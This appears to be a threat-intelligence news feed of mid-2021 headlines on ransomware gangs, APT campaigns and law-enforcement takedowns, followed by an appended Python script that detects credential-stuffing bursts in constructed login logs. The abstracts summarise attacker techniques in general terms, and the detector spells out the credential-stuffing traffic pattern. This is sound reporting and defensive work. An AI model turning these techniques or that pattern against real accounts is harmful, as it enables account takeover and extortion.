Abstract A coordinated international law enforcement operation resulted in the takedown of a VPN service called DoubleVPN for providing a safe haven for cybercriminals to cover their tracks. "On 29th of June 2021, law enforcement took down DoubleVPN," the agencies said in a seizure notice splashed on the now-defunct site. "Law enforcement gained access to the servers of DoubleVPN and seized personal information, logs and statistics kept by DoubleVPN about all of its customers. DoubleVPN's owners failed to provide the services they promised." The criminal investigation was conducted by agencies from Bulgaria, Canada, Germany, Italy, Sweden, Switzerland, the Netherlands, U.K., and the U.S., alongside authorities from Eurojust and Europol's European Cybercrime Centre (EC3). DoubleVPN is said to have been heavily advertised on both Russian and English-speaking underground cybercrime forums as a means to mask the location and identities of ransomware operators and

The Hacker News


June 30, 2021

[Webinar] How Cyber Attack Groups Are Spinning a Larger Ransomware Web Full Text

Abstract Organizations today already have an overwhelming number of dangers and threats to look out for, from spam to phishing attempts to new infiltration and ransomware tactics. There is no chance to rest, since attack groups are constantly looking for more effective means of infiltrating and infecting systems. Today, there are hundreds of groups devoted to infiltrating almost every industry, constantly devising more sophisticated methods to attack organizations. It's even more troubling to note that some groups have started to collaborate, creating complex and stealthy tactics that leave even the best security teams scrambling to respond. Such is the case noted by XDR Provider Cynet, as the company observes in its newest Research Webinar ( register here ). Cynet's research team noted that two of the most infamous attack groups – Lunar Spider and Wizard Spider – have started working together to infect organizations with ransomware. The development is certainly troubling, and the

The Hacker News


June 30, 2021

Ransomware group ‘Hades’ claims more victims as investigators seek answers Full Text

Abstract The Hades ransomware group, which is involved in big game hunting against billion-dollar companies, has claimed to have hit at least seven victims since its discovery late last year.

Cyberscoop


June 30, 2021

SolarWinds hackers remained hidden in Denmark’s central bank for months Full Text

Abstract Russia-linked threat actors compromised Denmark’s central bank (Danmarks Nationalbank) and remained in its systems for months.

Security Affairs


June 29, 2021

Ursnif Operators Leverage Cerberus to Automate Fraudulent Bank Transfers in Italy Full Text

Abstract A variant of the Ursnif Trojan is being used in the wild to target online banking users in Italy. As part of the attack, the trojan tricks desktop users into downloading an app from a fake Google Play page to infect their mobile device with the Cerberus malware. Users are recommended to avoid clickin ...

Cyware Alerts - Hacker News


June 28, 2021

Could curtailing cryptocurrency calm cyber crimewave? Full Text

Abstract One of the most widely circulated policy ideas to curtail ransomware would be to treat cryptocurrencies as a bona fide component of the financial system: require cryptocurrency exchanges to abide by regulations that reduce anonymity and prevent money laundering. SC Media broke down the potential.

SCMagazine


June 28, 2021

Ransomware gangs now creating websites to recruit affiliates Full Text

Abstract Ever since two prominent Russian-speaking cybercrime forums banned ransomware-related topics, criminal operations have been forced to promote their services through alternative methods.

BleepingComputer


June 26, 2021

New ransomware group Hive leaks Altus group sample files Full Text

Abstract On June 14th, Altus Group, a commercial real estate software solutions firm, disclosed a security breach; the Hive ransomware gang has now leaked its files.

Security Affairs


June 25, 2021

Marketo Marketplace – Cybercriminals are targeting major law firms Full Text

Abstract Cybercriminals have put 58GB of data stolen from Hollingsworth LLP up for sale on the dark web. Marketo, an emerging underground marketplace for stolen data available on the Tor network, announced the publication of data presumably stolen from Hollingsworth...

Security Affairs


June 25, 2021

FIN7 Pen Tester to Serve Seven Years Full Text

Abstract US sends down high-level member of hacking group behind $1bn card-stealing scheme

Infosecurity Magazine


June 25, 2021

Crackonosh Malware Author Minted $2 Million in Cryptocurrency After Infecting 222,000 Windows Systems Full Text

Abstract It has done so by hiding its malware in pirated and cracked copies of popular software, Daniel Beneš, a malware analyst for antivirus maker Avast, said in a report today.

The Record


June 24, 2021

Clop Gang Partners Laundered $500 Million in Ransomware Payments Full Text

Abstract The cybercrime ring that was apprehended last week in connection with Clop (aka Cl0p) ransomware attacks against dozens of companies in the last few months helped launder money totaling $500 million for several malicious actors through a plethora of illegal activities. "The group — also known as FANCYCAT — has been running multiple criminal activities: distributing cyber attacks; operating a high-risk exchanger; and laundering money from dark web operations and high-profile cyber attacks such as Cl0p and Petya ransomware," popular cryptocurrency exchange Binance said Thursday. On June 16, the Ukraine Cyber Police nabbed six individuals in the city of Kyiv, describing the arrests as resulting from an international operation involving law enforcement authorities from Korea, the U.S., and Interpol. While the bust was seen as a major blow to the operations of the Clop gang, the hackers published earlier this week a fresh batch of confidential employee records stolen from

The Hacker News


June 24, 2021

Cyber-stalker Blackmailed Nebraska Legislature Candidate’s Wife Full Text

Abstract Nebraskan found guilty of sending indecent images and threatening emails to Diane Parris

Infosecurity Magazine


June 24, 2021

Binance exchange helped track down Clop ransomware money launderers Full Text

Abstract Cryptocurrency exchange service Binance played an important part in the recent arrests of Clop ransomware group members, helping law enforcement in their effort to identify, and ultimately detain the suspects.

BleepingComputer


June 24, 2021

Arrested Clop gang members laundered over $500M in ransomware payments Full Text

Abstract The members of the Cl0p ransomware gang that were arrested in Ukraine as part of an international law enforcement action also operated money laundering services for multiple cybercrime groups.

The Record


June 23, 2021

LV ransomware operators repurposed a REvil binary to launch a new RaaS Full Text

Abstract The LV ransomware operators repurposed a REvil binary to create their own strain and launch a ransomware-as-a-service (RaaS) offering, a newcomer's attempt to enter the cybercrime arena.

Security Affairs


June 23, 2021

Ransomware Gang Cl0p Announces New Victim After Police Bust Full Text

Abstract Recent arrests of Cl0p members were seen as a victory against the gang that has hit dozens of victims, including U.S. bank Flagstar, law firm Jones Day, Shell, and some universities in the U.S.

Vice


June 23, 2021

Scammer arrested for phishing operation, sent 25,000 texts in a day Full Text

Abstract Police arrested an individual last week for sending fraudulent text messages to thousands of people in order to obtain their banking details and defraud them.

BleepingComputer


June 23, 2021

Clop ransomware is back in business after recent arrests Full Text

Abstract The Clop ransomware operation is back in business after recent arrests and has begun listing new victims on their data leak site again.

BleepingComputer


June 23, 2021

FIN7 Cybercriminals Impersonated SEC Officials, Sick Restaurant Customers to Lure Victims Full Text

Abstract FIN7 impersonated angry restaurant customers and targeted specific individuals with access to financial information, U.S. prosecutors argue in a court filing that sheds new light on the hacker group.

Cyberscoop


June 22, 2021

Mysterious ransomware payment traced to a sensual massage site Full Text

Abstract A ransomware attack targeting an Israeli company has led researchers to trace a portion of the ransom payment to a website promoting sensual massages.

BleepingComputer


June 21, 2021

Lazarus Sub-group Evolves to Target South Korea Full Text

Abstract This year in April, a suspicious Word document was spotted that had a Korean file name and decoy. On analysis, researchers found a unique infection pattern and an unknown payload.

Cyware Alerts - Hacker News


June 21, 2021

Cybercriminals Claim to Plant Backdoor and Steal Data From NATO’s Cloud Platform Full Text

Abstract Cybercriminals claim that they managed to make copies of the data on the SOA & IdM platform used by NATO by planting a malware backdoor and that they tried to blackmail Everis.

Softpedia News


June 21, 2021

Data leak marketplace pressures victims by emailing competitors Full Text

Abstract The Marketo data theft marketplace is applying maximum pressure on victims by emailing their competitors and offering sample packs of the stolen data.

BleepingComputer


June 21, 2021

Inside a ransomware attack: how dark webs of cybercriminals collaborate to pull one off Full Text

Abstract Not only is a ransomware attack a blended crime, including different offenses across different bodies of law, but also a crime that straddles the remit of different policing agencies and countries.

The Times Of India


June 21, 2021

Ransomware Actors Evolved Operations in 2020 Full Text

Abstract Over the last several years, cybercrime adversaries that engage in big game hunting ransomware attacks have advanced rapidly in terms of their capabilities and sophistication.

Crowdstrike


June 19, 2021

A deep dive into the operations of the LockBit ransomware group Full Text

Abstract Forensic investigations of machines attacked by LockBit affiliates show that threat groups will often first try to identify "mission-critical" systems including NAS devices, backup servers, and domain controllers.

ZDNet


June 18, 2021

Ferocious Kitten Uses MarkiRAT to Target Iranian Regime Full Text

Abstract An APT group based out of Iran is actively targeting Iranian users to deliver MarkiRAT, which records keystrokes and clipboard content. Two suspicious documents related to it were uploaded to VirusTotal. It appears the attackers are trying to enhance their arsenal with new tools to make their attack ...

Cyware Alerts - Hacker News


June 18, 2021

Texan Admits Data Center Bomb Plot Full Text

Abstract Wichita Falls man hoped to “kill off 70% of the internet” by obliterating Virginia data center

Infosecurity Magazine


June 18, 2021

Fake DarkSide gang targets energy, food industry in extortion emails Full Text

Abstract Threat actors impersonate the now-defunct DarkSide Ransomware operation in fake extortion emails sent to companies in the energy and food sectors.

BleepingComputer


June 18, 2021

A deep dive into the operations of the LockBit ransomware group Full Text

Abstract An investigation revealed that LockBit affiliates most often will buy RDP access to servers as an initial attack vector, although they may also use typical phishing and credential stuffing techniques.

ZDNet


June 18, 2021

Threat Actors in Recent Campaign Pose as Darkside to Target Energy and Food Sectors Full Text

Abstract The content of the emails led researchers to believe that they did not come from DarkSide, but from an attacker trying to profit off the current situation around DarkSide ransomware activities.

Trend Micro


June 17, 2021

Senators unveil legislation to crack down on cyber criminals Full Text

Abstract A bipartisan group of senators on Thursday unveiled legislation intended to crack down on cyber criminals, who have increasingly posed a threat to critical U.S. organizations.

The Hill


June 17, 2021

Molerats Hackers Return With New Attacks Targeting Middle Eastern Governments Full Text

Abstract A Middle Eastern advanced persistent threat (APT) group has resurfaced after a two-month hiatus to target government institutions in the Middle East and global government entities associated with geopolitics in the region in a rash of new campaigns observed earlier this month. Sunnyvale-based enterprise security firm Proofpoint attributed the activity to a politically motivated threat actor it tracks as TA402, and known by other monikers such as Molerats and GazaHackerTeam. The threat actor is believed to have been active for a decade, with a history of striking organizations primarily located in Israel and Palestine, and spanning multiple verticals such as technology, telecommunications, finance, academia, military, media, and governments. The latest wave of attacks commenced with spear-phishing emails written in Arabic and containing PDF attachments that come embedded with a malicious geofenced URL to selectively direct victims to a password-protected archive only if the source IP a

The Hacker News


June 17, 2021

UNC2465 cybercrime group launched a supply chain attack on CCTV vendor Full Text

Abstract UNC2465, a cybercrime group affiliated with the DarkSide ransomware gang, has infected the website of a CCTV camera vendor with malware in a supply chain attack against...

Security Affairs


June 17, 2021

Cybercriminals Go After Amazon Prime Day Shoppers with Spoofed Domains Full Text

Abstract In the last 30 days, over 2,300 new Amazon-related domains were registered, a 10% increase from the previous Amazon Prime Day; the majority are now either malicious or suspicious.

Check Point Research


June 16, 2021

An international joint operation resulted in the arrest of Clop ransomware members Full Text

Abstract Ukraine police arrested multiple individuals believed to be linked to the Clop ransomware gang as part of an international joint operation.

Security Affairs


June 16, 2021

Avaddon Ransomware Gang Evaporates Amid Global Crackdowns Full Text

Abstract Ransomware group releases decryptors for nearly 3,000 victims, forfeiting millions in payouts.

Threatpost


June 16, 2021

Gold Winter is the Group Behind Hades Ransomware Full Text

Abstract Researchers took the wraps off the operators of the Hades ransomware after coming across a new adversary group, Gold Winter, whose behavior coincides with the former. The recent finding suggests that threat actors may be deliberately trying to find ways to look different or evolve their attack techn ...

Cyware Alerts - Hacker News


June 16, 2021

Avaddon Ransomware Calls It Quits, Distributes Keys for Free Full Text

Abstract The Avaddon ransomware gang shared 2,934 decryption keys with BleepingComputer via an anonymous tip pretending to be from the FBI. BleepingComputer soon shared the keys with Emsisoft, which confirmed they were legitimate.

Cyware Alerts - Hacker News


June 16, 2021

Members of Clop Ransomware Gang Arrested in Ukraine Full Text

Abstract A police operation in Ukraine has led to the arrest of six people allegedly part of the notorious Clop ransomware group

Infosecurity Magazine


June 16, 2021

Cl0p affiliated hackers exposed in Ukraine Full Text

Abstract Ukrainian police reported uncovering a group of hackers who used the Cl0p ransomware to extort money from foreign businesses, mainly in the United States and South Korea.

Cyber News


June 16, 2021

Ukraine Police Arrest Cyber Criminals Behind Clop Ransomware Attacks Full Text

Abstract Ukrainian law enforcement officials on Wednesday announced the arrest of the Clop ransomware gang, adding it disrupted the infrastructure employed in attacks targeting victims worldwide since at least 2019. As part of a joint operation between the National Police of Ukraine and authorities from the Republic of Korea and the U.S., six defendants have been accused of running a double extortion scheme wherein victims refusing to pay a ransom were threatened with the leak of sensitive financial, customer, or personal data stolen from them prior to encrypting the files. The ransomware attacks amount to $500 million in monetary damages, the National Police said, noting that "law enforcement has managed to shut down the infrastructure from which the virus spreads and block channels for legalizing criminally acquired cryptocurrencies." Law enforcement officers are said to have conducted 21 searches in the Ukrainian capital and Kyiv region, including the homes of the defendan

The Hacker News


June 16, 2021

Ukraine arrests Clop ransomware gang members, seizes servers Full Text

Abstract Ukrainian law enforcement arrested cybercriminals associated with the Clop ransomware gang and shut down infrastructure used in attacks targeting victims worldwide since at least 2019.

BleepingComputer


June 16, 2021

Ransomware Attackers Partnering With Cybercrime Groups to Hack High-Profile Targets Full Text

Abstract As ransomware attacks against critical infrastructure skyrocket, new research shows that threat actors behind such disruptions are increasingly shifting from using email messages as an intrusion route to purchasing access from cybercriminal enterprises that have already infiltrated major targets. "Ransomware operators often buy access from independent cybercriminal groups who infiltrate major targets and then sell access to the ransomware actors for a slice of the ill-gotten gains," researchers from Proofpoint said in a write-up shared with The Hacker News. "Cybercriminal threat groups already distributing banking malware or other trojans may also become part of a ransomware affiliate network." Besides angling for a piece of the illegal profits, the email and cloud security firm said it is currently tracking at least 10 different threat actors who play the role of "initial access facilitators" to supply affiliates and other cybercrime groups with an e

The Hacker News


June 16, 2021

Andariel Threat Group Evolves to Target South Korean Entities with Custom Ransomware Full Text

Abstract The threat actor has been spreading the third stage payload from the middle of 2020 onwards and leveraged malicious Word documents and files mimicking PDF documents as infection vectors.

Kaspersky Labs


June 15, 2021

Iranian State-Sponsored Cybercriminal Hacked Former Israeli Defense Chief Full Text

Abstract Yaser Balaghi, a cybercriminal working for Iran attacked the computer of a former IDF chief of staff and gained access to his entire computer database, says Times of Israel.

Softpedia


June 15, 2021

Former NSA contractor Reality Winner who leaked gov report will be released in November Full Text

Abstract Reality Winner, a former NSA intelligence contractor who leaked a classified hacking report to the press in 2017, has been released from prison to home confinement.

Security Affairs


June 15, 2021

REvil ransomware gang hit US nuclear weapons contractor Sol Oriens Full Text

Abstract The REvil ransomware gang made the headlines again: the group hit the US nuclear weapons contractor Sol Oriens and stole the victim's data.

Security Affairs


June 14, 2021

Biden Opposes Conditional Handover of Cyber-criminals Full Text

Abstract Biden snuffs out Putin’s proposal to agree to conditional handover of cyber-criminals between Russia and US

Infosecurity Magazine


June 14, 2021

One of ransomware’s top negotiators would rather you not have to hire him Full Text

Abstract Kurtis Minder, CEO of threat intelligence firm GroupSense, has received a lot of press as a top negotiator in ransomware cases. But he’d rather you not hire him to negotiate. Instead, he says, he’d much rather you stop the ransomware attack before you’d ever need to call him in.

SCMagazine


June 13, 2021

Chinese Hackers Believed to be Behind Second Cyberattack on Air India Full Text

Abstract Even as a massive data breach affecting Air India came to light the previous month, India's flag carrier airline appears to have suffered a separate cyber assault that lasted for a period of at least two months and 26 days, new research has revealed, which attributed the incident with moderate confidence to a Chinese nation-state threat actor called APT41. Group-IB dubbed the campaign "ColunmTK" based on the names of command-and-control (C2) server domains that were used for facilitating communications with the compromised systems. "The potential ramifications of this incident for the entire airline industry and carriers that might yet discover traces of ColunmTK in their networks are significant," the Singapore-headquartered threat hunting company said. While Group-IB suggested that this may have been a supply chain attack targeting SITA, the Swiss aviation information technology company told The Hacker News that they are two different security incidents.

The Hacker News


June 11, 2021

Avaddon ransomware gang shuts down their operations and releases decryption keys Full Text

Abstract The Avaddon ransomware gang has shut down its operations and released the decryption keys to allow victims to recover their files for free. Good news for the victims of the Avaddon ransomware gang, the cybercrime group has shut down its operations...

Security Affairs


June 11, 2021

Avaddon ransomware shuts down and releases decryption keys Full Text

Abstract The Avaddon ransomware gang has shut down operations and released the decryption keys for their victims to BleepingComputer.com.

BleepingComputer


June 11, 2021

US Department of Justice, International Law Enforcement Disrupt Major Marketplace for Cybercriminals Full Text

Abstract The US Justice Department partnered with international law enforcement to take down an online marketplace offering stolen login credentials for various accounts including bank and online payment.

Cyberscoop


June 11, 2021

Cybercriminals Sell Access to FIFA 21 Matchmaking Servers After Attack on Electronic Arts Full Text

Abstract Electronic Arts, the maker of popular video games including FIFA, Madden, Sims, and others, said Thursday that it was investigating an intrusion that led to the leak of game source code and tools.

New York Times


June 11, 2021

New Cyber Espionage Group Targeting Ministries of Foreign Affairs Full Text

Abstract Cybersecurity researchers on Thursday took the wraps off a new cyberespionage group that has been behind a series of targeted attacks against diplomatic entities and telecommunication companies in Africa and the Middle East since at least 2017. Dubbed "BackdoorDiplomacy," the campaign involves targeting weak points in internet-exposed devices such as web servers to perform a panoply of cyber hacking activities, including laterally moving across the network to deploy a custom implant called Turian that's capable of exfiltrating sensitive data stored in removable media. "BackdoorDiplomacy shares tactics, techniques, and procedures with other Asia-based groups. Turian likely represents a next stage evolution of Quarian, the backdoor last observed in use in 2013 against diplomatic targets in Syria and the U.S," said Jean-Ian Boutin, head of threat research at Slovak cybersecurity firm ESET. Engineered to target both Windows and Linux operating systems, the

The Hacker News


June 10, 2021

‘Fancy Lazarus’ Cyberattackers Ramp up Ransom DDoS Efforts Full Text

Abstract The group, known for masquerading as various APT groups, is back with a spate of attacks on U.S. companies.

Threatpost


June 10, 2021

Evil Corp Rebranded its Ransomware Operation Again Full Text

Abstract The most-wanted Russian hacking group recently rebranded itself as new PayloadBIN ransomware to evade sanctions imposed by the U.S. Treasury. Previously, the gang had mimicked the Hades ransomware to bypass U.S. sanctions. The gang started rebranding its ransomware operations to different names (Ha ...

Cyware Alerts - Hacker News


June 09, 2021

Stealthy Gelsemium cyberspies linked to NoxPlayer supply-chain attack Full Text

Abstract ESET researchers have linked a stealthy cyberespionage group known as Gelsemium to the NoxPlayer Android emulator supply-chain attack that targeted gamers earlier this year.

BleepingComputer


June 9, 2021

Cybercriminals Impersonate FINRA to Target Members Firms via Targeted Phishing Attacks Full Text

Abstract FINRA reminded financial industry firms to verify the legitimacy of any suspicious email prior to responding to it, opening any attachments, or clicking on any embedded links.

FINRA


June 8, 2021

Evil Corp Rebrands Ransomware to Escape Sanctions Full Text

Abstract Notorious threat group copies name of new Babuk "PayloadBin" leak site

Infosecurity Magazine


June 8, 2021

Cybercriminals Publish Largest Ever Password Compilation with 8.4 Billion Entries on Hacker Forum Full Text

Abstract Since most people reuse their passwords across multiple apps and websites, the number of accounts affected by credential stuffing and password spraying attacks in the wake of this leak is likely huge.

Security Affairs


June 5, 2021

Cybercriminals Target Retail Chains and Food Joints Full Text

Abstract Almost all retail businesses today depend on the internet for most of their operations. While they invest in state-of-the-art platforms, meeting adequate security protocols appears to be a blockage. Retail firms are recommended to invest regularly in their existing security solutions and stay ...

Cyware Alerts - Hacker News


June 3, 2021

FBI confirmed that JBS was hit by the REvil ransomware gang Full Text

Abstract The US FBI announced that REvil ransomware gang (also known as Sodinokibi) is behind the attack that hit JBS Foods. On May 30, the American food processing giant JBS Foods, the world’s largest processor of fresh beef, was forced to shut down production at...

Security Affairs


June 3, 2021

FBI: REvil Ransomware Group Behind JBS Attack Full Text

Abstract The FBI said it would be working to bring the REvil group to justice for the hack on JBS

Infosecurity Magazine


June 2, 2021

REvil Ransomware Ground Down JBS: Sources Full Text

Abstract Responsible nations don’t harbor cybercrooks, the Biden administration admonished Russia, home to the gang that reportedly froze the global food distributor’s systems.

Threatpost


June 02, 2021

FBI: REvil cybergang behind the JBS ransomware attack Full Text

Abstract The Federal Bureau of Investigations has officially stated that the REvil operation, aka Sodinokibi, is behind the ransomware attack targeting JBS, the world's largest meat producer.

BleepingComputer


June 02, 2021

Cybercriminals Hold $115,000-Prize Contest to Find New Cryptocurrency Hacks Full Text

Abstract A top Russian-language underground forum has been running a "contest" for the past month, calling on its community to submit "unorthodox" ways to conduct cryptocurrency attacks. The forum's administrator, in an announcement made on April 20, 2021, invited members to submit papers that assess the possibility of targeting cryptocurrency-related technology, including the theft of private keys and wallets, in addition to covering unusual cryptocurrency mining software, smart contracts, and non-fungible tokens (NFTs). The contest, which is likely to continue till September 1, will see total prize money of $115,000 awarded to the best research. "So far, the top candidates (according to forum member voting) include topics like generating a fake blockchain front-end website that captures sensitive information such as private keys and balances, creating a new cryptocurrency blockchain from scratch, increasing the hash rate speed of mining farms and botnets, a

The Hacker News


June 2, 2021

Hacking Outfit Linked to Russia Is Behind JBS Cyberattack Full Text

Abstract REvil, a notorious Russia-linked hacking group is behind the cyberattack against JBS SA, according to four people familiar with the assault who were not authorized to speak publicly on the matter.

Bloomberg


June 01, 2021

US: Russian threat actors likely behind JBS ransomware attack Full Text

Abstract White House has confirmed today that JBS, the world's largest beef producer, was hit by a ransomware attack over the weekend coordinated by a group likely from Russia.

BleepingComputer


June 1, 2021

Prometheus and Grief – two new emerging ransomware gangs targeting enterprises. Mexican Government data is published for sale. Full Text

Abstract "Prometheus" and "Grief": the multi-billion dollar ransomware market has gained two new emerging players. In today's world, information and data mean money, and the people stealing that information have reached new levels of sophistication...

Security Affairs


June 1, 2021

Prometheus and Grief Ransomware Gangs Release Data From Mexican Government and Private Firm for Sale Full Text

Abstract Prometheus published stolen data allegedly belonging to the Mexican Government, possibly becoming the first cybercriminal group to have hit a major Latin American state at this level.

Security Affairs


May 30, 2021

Interpol has intercepted $83 million from financial cyber crimes Full Text

Abstract Interpol has intercepted $83 million in illicit funds transferred from victims to accounts used by crooks. The operation, codenamed HAECHI-I, was conducted by more than 40 officers in the Asia Pacific region over a six-month period...

Security Affairs


May 30, 2021

Interpol intercepts $83 million fighting financial cyber crime Full Text

Abstract INTERPOL (the International Criminal Police Organisation) has intercepted $83 million belonging to victims of online financial crime before it could be transferred to the accounts of their attackers.

BleepingComputer


May 28, 2021

SolarWinds Hackers Target Think Tanks With New ‘NativeZone’ Backdoor Full Text

Abstract Microsoft on Thursday disclosed that the threat actor behind the SolarWinds supply chain hack returned to the threat landscape to target government agencies, think tanks, consultants, and non-governmental organizations located across 24 countries, including the U.S. "This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations," Tom Burt, Microsoft's Corporate Vice President for Customer Security and Trust, said. "At least a quarter of the targeted organizations were involved in international development, humanitarian, and human rights work." Microsoft attributed the intrusions to the Russian threat actor it tracks as Nobelium, and by the wider cybersecurity community under the monikers APT29, UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), and Dark Halo (Volexity). The latest wave in a series of intrusions is said to have begun on Jan. 28, 2021, before reaching a new level of escalat

The Hacker News


May 28, 2021

Microsoft: SolarWinds hackers target govt agencies from 24 countries Full Text

Abstract The Microsoft Threat Intelligence Center (MSTIC) has discovered that the Russia-based SolarWinds hackers are behind an ongoing phishing campaign targeting government agencies worldwide.

BleepingComputer


May 27, 2021

How North Korean Threat Actors Pulled Off Multimillion-Dollar Heists? Full Text

Abstract ClearSky attributed multiple attacks on cryptocurrency exchanges to a threat actor, dubbed CryptoCore, and linked its activities with Lazarus. It swindled hundreds of millions of dollars from the U.S., Israel, Europe, and Japan over the past three years.

Cyware Alerts - Hacker News


May 26, 2021

Cybercriminals Exploiting API Keys to Steal Cryptocurrency Full Text

Abstract Stolen API keys are being increasingly sold on hacker forums. Cyber adversaries are exploiting cryptocurrency exchange API keys and using them to steal cryptocurrencies from victims.

Cyware Alerts - Hacker News


May 26, 2021

Hackers release patient data stolen from New Zealand health systems Full Text

Abstract Hackers sent patient data stolen during an attack on New Zealand’s Waikato District health system to local media outlets on Wednesday, with the outlets declining to publish the sensitive information. 

The Hill


May 26, 2021

Cyber-criminal Gang Targets Texas Unemployment System Full Text

Abstract Scattered Canary shares 13-page tutorial on how to commit fraud via Texas Workforce Commission website

Infosecurity Magazine


May 25, 2021

Report: how cybercriminals abuse API keys to steal millions Full Text

Abstract It appears that stolen API keys for cryptocurrency trading apps are being used by cybercriminals to easily empty their victims’ accounts on all major cryptocurrency exchanges.

Cyber News


May 24, 2021

Zeppelin ransomware gang is back after a temporary pause Full Text

Abstract Operators behind the Zeppelin ransomware-as-a-service (RaaS), aka Buran, have resumed their operations after a temporary interruption, researchers from BleepingComputer reported...

Security Affairs


May 24, 2021

Michigan Man Admits Selling UPMC Employee Data Full Text

Abstract "TheDearthStar" hacker confesses to stealing and selling PII of more than 65,000 medical center employees

Infosecurity Magazine


May 21, 2021

DarkSide Getting Taken to ‘Hackers’ Court’ For Not Paying Affiliates Full Text

Abstract A shadow court system for hackers shows how professional ransomware gangs have become.

Threatpost


May 21, 2021

Report: how cybercriminals abuse API keys to steal millions Full Text

Abstract CyberNews researchers found that crooks could abuse cryptocurrency exchange API keys to steal cryptocurrencies. Original post available here: https://cybernews.com/security/report-how-cybercriminals-abuse-api-keys-to-steal-millions/ CyberNews...

Security Affairs


May 21, 2021

Ransomware Gang Gifts Decryption Tool to HSE Full Text

Abstract Cyber-criminals give Irish health system free decryption tool after crippling it with ransomware

Infosecurity Magazine


May 21, 2021

DarkSide affiliates claim gang’s bitcoin deposit on hacker forum Full Text

Abstract Since the DarkSide ransomware operation shut down a week ago, multiple affiliates have complained about not getting paid for past services and issued a claim for bitcoins in escrow at a hacker forum.

BleepingComputer


May 21, 2021

Bitcoins of DarkSide ransomware gang still locked in hacker forum’s escrow Full Text

Abstract After the DarkSide ransomware gang shut down operations, multiple affiliates complained about not receiving payment for successful breaches. The decision of the DarkSide ransomware gang to shut down operations is causing chaos among its network...

Security Affairs


May 19, 2021

DarkSide Gang Retires on $90m Full Text

Abstract Wallet containing Bitcoin worth over $90m is reportedly ransomware gang’s ill-gotten gains

Infosecurity Magazine


May 17, 2021

FIN7: Active Again with New Lizar Backdoor Full Text

Abstract The notorious cybercrime gang behind the Carbanak RAT is spreading a backdoor called Lizar under the guise of a Windows pen-testing tool for ethical hackers. Experts say the group may be planning to further sharpen its tools and techniques to make its attacks stealthier and more effective.

Cyware Alerts - Hacker News


May 17, 2021

Transparent Tribe Reappears with Expanded Malware Arsenal and TTPs Full Text

Abstract APT36 was found creating fake domains to impersonate military and defense firms and disseminate malware-laced documents to infect victims with ObliqueRAT and CrimsonRAT. Organizations are recommended to stay vigilant and implement adequate security measures proactively.

Cyware Alerts - Hacker News


May 14, 2021

Darkside gang lost control of their servers and funds Full Text

Abstract The operators of the Darkside ransomware announced that they have lost control of their infrastructure and part of the funds the gang obtained from victims...

Security Affairs


May 14, 2021

Arkose Labs looks to hit cybercriminals where it hurts with $70 million cash infusion Full Text

Abstract Funds will filter in part to research and development, building upon the Arkose model of undermining economic drivers behind fraud until attackers opt out.

SCMagazine


May 12, 2021

Cybercriminals Use Fake Android and iOS Apps Disguised as Trading and Cryptocurrency Apps to Conduct Fraud Full Text

Abstract These fraudulent applications are aimed at exploiting the increased interest in trading apps, driven by the recent significant rise in the value of cryptocurrencies and interest in stock trading.

Sophos


May 5, 2021

UNC2529, a new sophisticated cybercrime gang that targets U.S. orgs with 3 malware Full Text

Abstract A new financially motivated cybercrime gang, tracked by FireEye experts as UNC2529, has targeted many organizations in the US and other countries using new sophisticated malware...

Security Affairs


May 3, 2021

Online Child Abuse Platform with 400k Users Taken Down Full Text

Abstract Darknet CSAM site Boystown seized and alleged site operators arrested

Infosecurity Magazine


May 3, 2021

How Cybercriminals Abuse OpenBullet for Credential Stuffing Full Text

Abstract As the business of acquiring unique credentials continues to become more lucrative, cybercriminals are growing their attack tools and techniques by abusing legitimate software for nefarious purposes.

Trend Micro
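Credential-stuffing tools such as the one described above (and the stale compilations they are fed, like the 8.4 billion-entry list reported on June 8) leave a characteristic trace in login logs: one source trying many distinct accounts in a short window, with most attempts failing and the few successes marking the accounts that now need a forced reset. The detection below is an added example, not code from Trend Micro or from the article; the log format, the thresholds and the log lines themselves are constructed here.

```python
"""Spot credential-stuffing bursts in web login logs.

Added example; not code from the article, Trend Micro, or any tool it names.
Log format (assumed): one attempt per line, "<ISO timestamp> ip=.. user=.. result=OK|FAIL".
"""
from collections import defaultdict
from datetime import datetime, timedelta

TS_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
WINDOW = timedelta(minutes=5)
MIN_DISTINCT_USERS = 10    # one IP cycling through this many accounts inside WINDOW
MIN_FAILURE_RATE = 0.8     # stuffing lists are mostly stale, so most attempts fail


def parse_line(line: str) -> dict:
    """Parse one constructed log line into a dict with a datetime, ip, user and success flag."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return {
        "ts": datetime.strptime(ts, TS_FORMAT),
        "ip": kv["ip"],
        "user": kv["user"],
        "ok": kv["result"] == "OK",
    }


def detect_stuffing(lines) -> list:
    """Return one alert per source IP whose attempts in any WINDOW look like stuffing.

    Each alert carries the accounts that succeeded inside the burst ("hijacked"),
    which are the ones to lock and force through a password reset.
    """
    events = sorted((parse_line(l) for l in lines), key=lambda e: e["ts"])
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window so it spans at most WINDOW of wall-clock time.
            while evs[end]["ts"] - evs[start]["ts"] > WINDOW:
                start += 1
            window = evs[start:end + 1]
            users = {e["user"] for e in window}
            fails = sum(1 for e in window if not e["ok"])
            if len(users) >= MIN_DISTINCT_USERS and fails / len(window) >= MIN_FAILURE_RATE:
                alerts.append({
                    "ip": ip,
                    "window_start": window[0]["ts"].strftime(TS_FORMAT),
                    "attempts": len(window),
                    "distinct_users": len(users),
                    "hijacked": sorted(e["user"] for e in window if e["ok"]),
                })
                break  # one alert per IP is enough; the SOC can pull the full history
    return alerts


def _constructed_log() -> list:
    """Sample input built in memory: one stuffing burst and one legitimate user mistyping."""
    base = datetime(2021, 5, 3, 10, 0, 0)
    lines = []
    for i in range(12):  # attacker: 12 different accounts in two minutes, one of them valid
        user, result = ("carol", "OK") if i == 7 else (f"user{i:02d}", "FAIL")
        stamp = (base + timedelta(seconds=10 * i)).strftime(TS_FORMAT)
        lines.append(f"{stamp} ip=203.0.113.5 user={user} result={result}")
    for i, result in enumerate(["FAIL", "FAIL", "OK"]):  # alice gets her own password wrong twice
        stamp = (base + timedelta(seconds=30 * i)).strftime(TS_FORMAT)
        lines.append(f"{stamp} ip=198.51.100.7 user=alice result={result}")
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for alert in detect_stuffing(SAMPLE_LOG):
        print(alert)
```

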